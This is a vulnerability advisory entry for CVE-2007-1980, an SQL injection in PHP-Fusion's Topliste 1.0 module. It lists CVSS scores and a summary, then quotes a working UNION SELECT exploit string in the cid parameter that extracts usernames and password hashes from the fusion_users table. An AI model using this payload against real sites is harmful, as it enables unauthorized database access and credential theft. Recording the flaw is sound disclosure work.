7.5
CVSSv2

CVE-2007-1980

Published: 12/04/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in the Topliste 1.0 module for PHP-Fusion allows remote malicious users to execute arbitrary SQL commands via the cid parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

nick jones topliste module 1.0

Exploits

-------------------------------- PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln -------------------------------- Bulan: xoron - unique xoronbiz -------------------------------- Exploit: indexphp?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/* --- ...